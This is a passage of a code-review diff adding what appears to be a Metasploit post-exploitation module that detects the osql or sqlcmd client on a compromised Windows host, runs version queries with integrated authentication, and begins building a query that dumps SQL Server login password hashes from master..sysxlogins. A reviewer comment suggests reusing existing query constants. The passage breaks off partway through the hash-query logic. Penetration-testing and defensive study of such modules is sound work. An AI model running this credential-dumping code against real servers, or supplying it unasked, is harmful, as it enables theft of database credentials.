modules/post/windows/manage/mssql_local_hashdump.rb

```diff
@@ -0,0 +1,430 @@
+
+    # Parse Data - osql
+    services_array1 = running_services1.split("\n")
+
+    # Check for osql
+    if services_array1.join =~ /(SQL Server Command Line Tool)|(usage: osql)/
+      print_status("OSQL client was found")
+      return "osql"
+    end
+
+    # Get Data - sqlcmd
+    running_services = run_cmd("sqlcmd -?")
+
+    # Parse Data - sqlcmd
+    services_array = running_services.split("\n")
+
+    # Check for SQLCMD
+    services_array.each do |service|
+      if service =~ /SQL Server Command Line Tool/ then
+        print_status("SQLCMD client was found")
+        return "sqlcmd"
+      end
+    end
+
+    # Fail
+    print_error("No native SQL client was found")
+    return 0
+  end
+
+  ## ----------------------------------------------
+  ## Method for getting SQL Version
+  ## ----------------------------------------------
+  def get_sql_version(sqlclient,instance,service_instance,verbose)
+
+    print_status("Attempting to get version...")
+
+    mssql_version_query = "SELECT @@version"
+
+    # Setup command format to accomidate version inconsistencies
+    if instance == ""
+      # Check default instance name
+      if service_instance == "MSSQLSERVER" then
+        print_status(" o MSSQL Service instance: #{service_instance}") if verbose == "true"
+        sqlcommand = "#{sqlclient} -E -S #{sysinfo['Computer']} -Q \"SET nocount on;#{mssql_version_query}\" -h-1"
+      else
+        # User defined instance
+      print_status(" o  OTHER Service instance: #{service_instance}") if verbose == "true"
+      sqlcommand = "#{sqlclient} -E -S #{sysinfo['Computer']}\\#{service_instance} -Q \"SET nocount on;#{mssql_version_query}\" -h-1"
+      end
+    else
+      # User defined instance
+      print_status(" o defined instance: #{service_instance}") if verbose == "true"
+      sqlcommand = "#{sqlclient} -E -S #{sysinfo['Computer']}\\#{instance} -Q \"SET nocount on;#{mssql_version_query}\" -h-1"
+    end
+
+    # Display debugging information
+    print_status("Running command:") if verbose == "true"
+    print_status("#{sqlcommand}") if verbose == "true"
+
+    # Get Data
+    get_version_result = run_cmd("#{sqlcommand}")
+
+    # Parse Data
+    get_version_array = get_version_result.split("\n")
+    version_year = get_version_array[0].strip.slice(/\d\d\d\d/)
+    if version_year
+      print_status("MSSQL version found: #{version_year}")
+      return version_year
+    else
+      print_error("MSSQL version not found")
+    end
+  end
+
+  ## ----------------------------------------------
+  ## Method for getting password hashes
+  ## ----------------------------------------------
+  def get_sql_hash(sqlclient,instance,service_instance,verbose)
+
+    version_year = get_sql_version(sqlclient,instance,service_instance,verbose)
+
+    case version_year
+    when "2000"
+      hashtype = "mssql"
+      mssql_password_hashes_query = "SELECT name+':'+master.dbo.fn_varbintohexstr(password) FROM master..sysxlogins"
```

Comment:
These queries could probably be retrieved from `Msf::Core::Exploit::MSSQL_COMMANDS`